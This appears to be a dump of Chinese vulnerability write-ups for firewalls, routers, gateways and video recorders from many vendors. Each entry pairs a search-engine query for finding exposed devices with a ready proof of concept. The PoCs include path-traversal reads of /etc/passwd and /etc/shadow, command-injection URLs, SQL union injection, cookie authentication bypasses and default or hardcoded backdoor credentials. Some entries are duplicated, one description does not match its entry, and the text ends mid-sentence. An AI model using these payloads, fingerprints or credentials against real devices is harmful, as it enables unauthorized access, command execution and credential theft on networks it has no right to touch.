-------------------------------------------------------------------------------- 1 | # 中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞, 攻击者通过漏洞可以读取服务器上的文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 中科网威 下一代防火墙控制系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="Get_Verify_Info(hex_md5(user_string)." 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162251851.png) 24 | 25 | 漏洞存在于 download.php 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162251009.png) 28 | 29 | 30 | 31 | 任意点击后抓包,更改 **toolname** 参数 32 | 33 | ```plain 34 | /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd 35 | ``` 36 | 37 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162251674.png) 38 | -------------------------------------------------------------------------------- /网络设备漏洞/中科网威 下一代防火墙控制系统 账号密码泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 中科网威 下一代防火墙控制系统 账号密码泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 中科网威 下一代防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 中科网威 下一代防火墙控制系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="Get_Verify_Info(hex_md5(user_string)." 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162250656.png) 24 | 25 | F12查看前端发现 admin的md5加密密码 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162250950.png) 28 | 29 | 解密后登录后台 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162251462.png) -------------------------------------------------------------------------------- /网络设备漏洞/佑友防火墙 后台命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 佑友防火墙 后台命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 佑友防火墙 后台维护工具存在命令执行,由于没有过滤危险字符,导致可以执行任意命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 佑友防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="佑友防火墙" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![1](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202201528474.png) 24 | 25 | 默认账号密码为 26 | 27 | ```plain 28 | User: admin 29 | Pass: hicomadmin 30 | ``` 31 | 32 | 登录后台 **系统管理 --> 维护工具 --> Ping** 33 | 34 | ![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202201528313.png) 35 | -------------------------------------------------------------------------------- /网络设备漏洞/华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接,导致远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 华夏创新 LotWan广域网优化系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="LotWan 广域网优化系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519182517187](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191825272.png) 24 | 25 | 存在漏洞的文件为 26 | 27 | ``` 28 | /acc/check_instance_state.php?ins=;id>cmd.txt 29 | ``` 30 | 31 | 再访问 `/acc/cmd.txt` 32 | 33 | ![image-20220519182529097](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191825165.png) -------------------------------------------------------------------------------- /网络设备漏洞/华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 华夏创新 LotWan广域网优化系统 static_arp.php文件参数 ethName存在命令拼接,导致远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 华夏创新 LotWan广域网优化系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="LotWan 广域网优化系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519182832800](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828884.png) 24 | 25 | 存在漏洞的文件为 26 | 27 | ``` 28 | /acc/bindipmac/static_arp.php?ethName=||id>cmd.txt|| 29 | ``` 30 | 31 | ![image-20220519182841776](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828819.png) 32 | 33 | 再访问 `/acc/bindipmac/cmd.txt` 34 | 35 | ![image-20220519182859597](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828666.png) -------------------------------------------------------------------------------- /网络设备漏洞/华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接,导致远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 华夏创新 LotWan广域网优化系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="LotWan 广域网优化系统" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519182931309](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191829394.png) 24 | 25 | 存在漏洞的文件为 static_arp_del.php, 通过union注入写入文件 26 | 27 | ``` 28 | /acc/bindipmac/static_arp_del.php?x=1&arpName=1' and 0 union select 1,'||id>cmd.txt||',3,4,5,6,7,8-- 29 | ``` 30 | 31 | 再访问 `/acc/bindipmac/cmd.txt` 32 | 33 | ![image-20220519182946695](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191829769.png) -------------------------------------------------------------------------------- /网络设备漏洞/博华网龙防火墙 users.xml 未授权访问.md: -------------------------------------------------------------------------------- 1 | # 博华网龙防火墙 users.xml 未授权访问 2 | 3 | ## 漏洞描述 4 | 5 | 博华网龙防火墙 users.xml文件 可被任意用户读取,其中包含登录的账号密码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 博华网龙防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "博华网龙防火墙" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162248506.png) 24 | 25 | 验证POC, 读取配置文件获取密码的Md5 26 | 27 | ```php 28 | /xml/users.xml 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162248359.png) -------------------------------------------------------------------------------- /网络设备漏洞/启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞.md: -------------------------------------------------------------------------------- 1 | # 启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 启明星辰 天清汉⻢USG防⽕墙 存在逻辑缺陷漏洞,攻击者通过账号密码可以进入后台后更改任意用户权限升级为管理员 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 启明星辰 天清汉马USG防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="天清汉马USG防火墙" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录后台后管理界面点击下面的图标 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162255701.png) 24 | 25 | 更改权限为任意用户,刷新后得到用户权限 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162255073.png) -------------------------------------------------------------------------------- /网络设备漏洞/启明星辰 天清汉马USG防火墙 默认口令漏洞.md: -------------------------------------------------------------------------------- 1 | # 启明星辰 天清汉马USG防火墙 默认口令漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 启明星辰 天清汉⻢USG防⽕墙 存在默认口令漏洞,攻击者通过账号密码可以进入后台 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 启明星辰 天清汉马USG防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="天清汉马USG防火墙" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 默认口令 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162254777.png) 26 | 27 | ```plain 28 | 账号:useradmin 29 | 密码:venus.user 30 | ``` 31 | 32 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162255446.png) 33 | 34 | 成功登录 35 | 36 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162255311.png) -------------------------------------------------------------------------------- /网络设备漏洞/大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 大华城市安防监控系统平台管理 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "attachment_downloadByUrlAtt.action" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519183144081](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191831267.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd 29 | ``` 30 | 31 | ![image-20220519183319607](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191833705.png) -------------------------------------------------------------------------------- /网络设备漏洞/奇安信 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 网康 NS-ASG安全网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | 网康 NS-ASG安全网关 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 出现漏洞的文件为 **/admin/cert_download.php** 22 | 23 | ```php 24 | ![2](C:\Users\47236\Desktop\2.png) 33 | ``` 34 | 35 | 此文件没有对身份进行校验即可下载任意文件 36 | 37 | ```plain 38 | /admin/cert_download.php?file=test.txt&certfile=../../../../../../../../etc/passwd 39 | ``` 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162231024.png) 42 | 43 | ```plain 44 | /admin/cert_download.php?file=test.txt&certfile=cert_download.php 45 | ``` 46 | 47 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162234357.png) -------------------------------------------------------------------------------- /网络设备漏洞/宏电 H8922 Telnet后门漏洞 CVE-2021-28149.md: -------------------------------------------------------------------------------- 1 | # 宏电 H8922 Telnet后门漏洞 CVE-2021-28149 2 | 3 | ## 漏洞描述 4 | 5 | 宏电 H8922 Telnet存在硬编码的账号密码 且默认开放 5188端口连接,可以以Root身份获取权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 宏电 H8922 11 | ``` 12 | 13 | ## ZoomEye 14 | 15 | ``` 16 | app:"Hongdian H8922 Industrial Router" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 使用Telnet连接目标5188端口,账号密码为 **root/superzxmn** 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140922781.png) 24 | 25 | -------------------------------------------------------------------------------- /网络设备漏洞/小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371.md: -------------------------------------------------------------------------------- 1 | # 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371 2 | 3 | ## 漏洞描述 4 | 5 | 小米 路由器存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 小米 路由器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="小米路由器" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220715110456566](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151106569.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /api-third-party/download/extdisks../etc/shadow 29 | ``` 30 | 31 | ![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202207151106800.png) -------------------------------------------------------------------------------- /网络设备漏洞/悦泰节能 智能数据网关 resources 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 悦泰节能 智能数据网关 resources 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 悦泰节能 智能数据网关存在任意文件读取漏洞,通过构造特殊请求可以读取服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 悦泰节能 智能数据网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | body="/FWlib3/resources/css/xtheme-gray.cssz" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162249593.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /FWlib3/resources//../../../../../../../../etc/passwd 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162249623.png) -------------------------------------------------------------------------------- /网络设备漏洞/惠尔顿 e地通 config.xml 信息泄漏漏洞.md: -------------------------------------------------------------------------------- 1 | # 惠尔顿 e地通 config.xml 信息泄漏漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 惠尔顿 e地通Socks5 VPN登录系统 存在信息泄漏漏洞,访问特殊的Url即可获取管理员账号密码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 惠尔顿 e地通Socks5 VPN登录系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="惠尔顿-e地通VPN" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162228884.png) 24 | 25 | 访问 **/backup/config.xml,** 泄漏用户信息 26 | 27 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162228756.png) -------------------------------------------------------------------------------- /网络设备漏洞/朗视 TG400 GSM 网关目录遍历 CVE-2021-27328.md: -------------------------------------------------------------------------------- 1 | # 朗视 TG400 GSM 网关目录遍历 CVE-2021-27328 2 | 3 | ## 漏洞描述 4 | 5 | 朗视 TG400 GSM 网关存在目录遍历 ,攻击者可以通过漏洞获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 朗视 TG400 GSM 网关 11 | ``` 12 | 13 | ## 漏洞复现 14 | 15 | 暂无FOFA语句及固件设备复现 16 | 17 | ```plain 18 | 获取固件解密密码 19 | http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect 20 | /etc/passwd: 21 | http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd 22 | ``` 23 | 24 | ## 参考文章 25 | 26 | https://github.com/SQSamir/CVE-2021-27328 -------------------------------------------------------------------------------- /网络设备漏洞/浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 浙江宇视科技 网络视频录像机 ISC LogReport.php 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 浙江宇视科技 网络视频录像机 ISC /Interface/LogReport/LogReport.php 页面,fileString 参数过滤不严格,导致攻击者可执行任意命令 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 浙江宇视科技 网络视频录像机 ISC 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="uniview-ISC" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519183432893](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191834953.png) 24 | 25 | 验证POC 26 | 27 | ``` 28 | /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;id>1.txt 29 | ``` 30 | 31 | ![image-20220519183528302](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191835400.png) -------------------------------------------------------------------------------- /网络设备漏洞/烽火 HG6245D info.asp 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 烽火 HG6245D info.asp 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 烽火 HG6245D info.asp页面存在信息泄露漏洞,通过漏洞可获取内网连接用户MAC地址以及系统运行状态 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 烽火 HG6245D 11 | ``` 12 | 13 | ## 360 Quake 14 | 15 | ``` 16 | html_hash:"636e5c0d28c6b7401ce36eed34c461ca" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 访问 info.asp 页面 获取泄漏信息 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162250206.png) -------------------------------------------------------------------------------- /网络设备漏洞/电信 中兴ZXHN F450A网关 默认管理员账号密码漏洞.md: -------------------------------------------------------------------------------- 1 | # 电信 中兴ZXHN F450A网关 默认管理员账号密码漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 电信中兴ZXHN F450A网关 存在默认管理员账号密码 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 电信中兴ZXHN F450A网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | ZXHN F450A 17 | ``` 18 | 19 | ## 漏洞描述 20 | 21 | 登录页面如下 22 | 23 | 24 | 25 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140923388.png) 26 | 27 | ```plain 28 | user/pass 29 | 30 | useradmin/nE7jA%5m 普通管理员 31 | telecomadmin/nE7jA%5m 超级管理员 32 | ``` 33 | 34 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140923517.png) -------------------------------------------------------------------------------- /网络设备漏洞/电信 天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 电信 天翼网关F460 web_shell_cmd.gch 远程命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 电信天翼网关F460 web_shell_cmd.gch文件存在命令调试界面,攻击者可以利用获取服务器权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 电信天翼网关F460 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="F460" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 出现漏洞的文件为 web_shell_cmd.gch 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140925583.png) 24 | 25 | 直接输入命令就可以执行 **cat /etc/passwd** 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202140925693.png) -------------------------------------------------------------------------------- /网络设备漏洞/百卓 Patflow showuser.php 后台SQL注入漏洞.md: -------------------------------------------------------------------------------- 1 | # 百卓 Patflow showuser.php 后台SQL注入漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 百卓 Patflow showuser.php文件参数过滤不充分,导致后台存在SQL注入漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 百卓 Patflow 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | "Patflow" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![image-20220519183747439](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191837588.png) 24 | 25 | 默认口令登录后台 admin/admin 26 | 27 | 存在漏洞的文件为 shwouser.php,验证POC为 28 | 29 | ``` 30 | /user/showuser.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,(select%20group_concat(SCHEMA_NAME)%20f 31 | ``` 32 | 33 | ![image-20220519183758066](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191837110.png) -------------------------------------------------------------------------------- /网络设备漏洞/皓峰防火墙 setdomain.php 越权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 皓峰防火墙 setdomain.php 越权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 皓峰防火墙 setdomain.php 页面存在越权访问漏洞,攻击者通过漏洞可修改管理员等配置信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 皓峰防火墙 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="皓峰防火墙系统登录" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面 22 | 23 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110917093.png) 24 | 25 | 验证POC 26 | 27 | ```php 28 | /setdomain.php?action=list 29 | ``` 30 | 31 | ![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110916092.png) -------------------------------------------------------------------------------- /网络设备漏洞/磊科 NI360路由器 认证绕过漏洞.md: -------------------------------------------------------------------------------- 1 | # 磊科 NI360路由器 认证绕过漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 磊科 NI360路由器 存在认证绕过漏洞,通过添加特定的Cookie字段获取后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 磊科 NI360路由器 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="Netcore" 17 | ``` 18 | 19 | ## 漏洞描述 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949810.png) 24 | 25 | 添加 Cookie字段 : **netcore_login=guest:1** 26 | 27 | 刷新后登录后台 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949667.png) -------------------------------------------------------------------------------- /网络设备漏洞/网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞.md: -------------------------------------------------------------------------------- 1 | # 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 网康 NS-ASG安全网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | 网康 NS-ASG安全网关 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 出现漏洞的文件为 **/admin/cert_download.php** 22 | 23 | ```php 24 | ![2](C:\Users\47236\Desktop\2.png) 33 | ``` 34 | 35 | 此文件没有对身份进行校验即可下载任意文件 36 | 37 | ```plain 38 | /admin/cert_download.php?file=test.txt&certfile=../../../../../../../../etc/passwd 39 | ``` 40 | 41 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162231024.png) 42 | 43 | ```plain 44 | /admin/cert_download.php?file=test.txt&certfile=cert_download.php 45 | ``` 46 | 47 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162234357.png) -------------------------------------------------------------------------------- /网络设备漏洞/西迪特 Wi-Fi Web管理 Cookie 越权访问漏洞.md: -------------------------------------------------------------------------------- 1 | # 西迪特 Wi-Fi Web管理 Cookie 越权访问漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 西迪特 Wi-Fi Web管理系统后台过滤不足导致远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 西迪特 Wi-Fi Web管理 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title=="Wi-Fi Web管理" 17 | ``` 18 | 19 | ## 漏洞复现o 20 | 21 | 登录页面 22 | 23 | ![image-20220519183944313](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191839372.png) 24 | 25 | 添加Cookie,即可登录后台 26 | 27 | ``` 28 | Cookie: timestamp=0; cooLogin=1; cooUser=admin 29 | ``` 30 | 31 | ![image-20220519184113756](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191841849.png) -------------------------------------------------------------------------------- /网络设备漏洞/西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞.md: -------------------------------------------------------------------------------- 1 | # 西迪特 Wi-Fi Web管理 jumpto.php 后台命令执行漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 西迪特 Wi-Fi Web管理系统后台过滤不足导致远程命令执行漏洞 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 西迪特 Wi-Fi Web管理 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title=="Wi-Fi Web管理" 17 | ``` 18 | 19 | ## 漏洞复现o 20 | 21 | 登录页面 22 | 23 | ![image-20220519183944313](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191841065.png) 24 | 25 | 通过越权漏洞获取权限,添加Cookie 26 | 27 | ``` 28 | Cookie: timestamp=0; cooLogin=1; cooUser=admin 29 | ``` 30 | 31 | 进入后台后,诊断功能点存在命令拼接执行漏洞 32 | 33 | ![image-20220519184158173](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191841279.png) -------------------------------------------------------------------------------- /网络设备漏洞/迈普 ISG1000安全网关 任意文件下载漏洞.md: -------------------------------------------------------------------------------- 1 | # 迈普 ISG1000安全网关 任意文件下载漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 迈普 ISG1000安全网关 存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 迈普 ISG1000安全网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="迈普通信技术股份有限公司" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110950648.png) 24 | 25 | 请求的 POC 为 26 | 27 | ```plain 28 | /webui/?g=sys_dia_data_down&file_name=../etc/passwd 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110950317.png) -------------------------------------------------------------------------------- /网络设备漏洞/锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 锐捷 EG易网关 phpinfo.view.php 信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 锐捷EG易网关 部分版本 phpinfo.view.php文件权限设定存在问题,导致未经身份验证获取敏感信息 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 锐捷EG易网关 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | app="Ruijie-EG易网关" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 查看源码发现phpinfo文件 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110927256.png) 24 | 25 | 访问 url 26 | 27 | ```plain 28 | /tool/view/phpinfo.view.php 29 | ``` 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110927015.png) 32 | 33 | -------------------------------------------------------------------------------- /网络设备漏洞/锐捷 ISG 账号密码泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 锐捷 ISG 账号密码泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 锐捷ISG 存在账号密码泄露漏洞,通过查看前端,可以获取密码的md5值, 解密后获取后台权限 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 锐捷ISG 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="RG-ISG" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110925459.png) 24 | 25 | F12 查看到账号密码 26 | 27 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110925212.png) 28 | 29 | 解密md5 后登陆系统 30 | 31 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110925656.png) 32 | 33 | -------------------------------------------------------------------------------- /网络设备漏洞/锐捷 Smartweb管理系统 密码信息泄露漏洞.md: -------------------------------------------------------------------------------- 1 | # 锐捷 Smartweb管理系统 密码信息泄露漏洞 2 | 3 | ## 漏洞描述 4 | 5 | 锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 6 | 7 | ## 漏洞影响 8 | 9 | ``` 10 | 锐捷网络股份有限公司 无线smartweb管理系统 11 | ``` 12 | 13 | ## FOFA 14 | 15 | ``` 16 | title="无线smartWeb--登录页面" 17 | ``` 18 | 19 | ## 漏洞复现 20 | 21 | 登录页面如下 22 | 23 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110921639.png) 24 | 25 | 默认存在 guest账户,账号密码为 **guest/guest** 26 | 27 | 其中登录的过程中搜索admin的数据后发现请求了一个文件 **/web/xml/webuser-auth.xml**,而且响应中包含了 admin密码的base64加密 28 | 29 | ![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110921386.png) 30 | 31 | 解密就可以获得 